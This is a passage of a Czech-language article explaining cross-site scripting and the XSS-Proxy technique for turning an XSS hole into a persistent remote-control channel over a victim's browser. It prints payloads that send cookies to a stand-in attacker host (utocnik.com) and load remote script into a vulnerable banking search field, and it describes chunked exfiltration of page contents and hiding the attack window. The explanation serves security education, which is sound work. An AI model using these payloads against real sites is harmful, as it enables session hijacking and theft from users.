hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky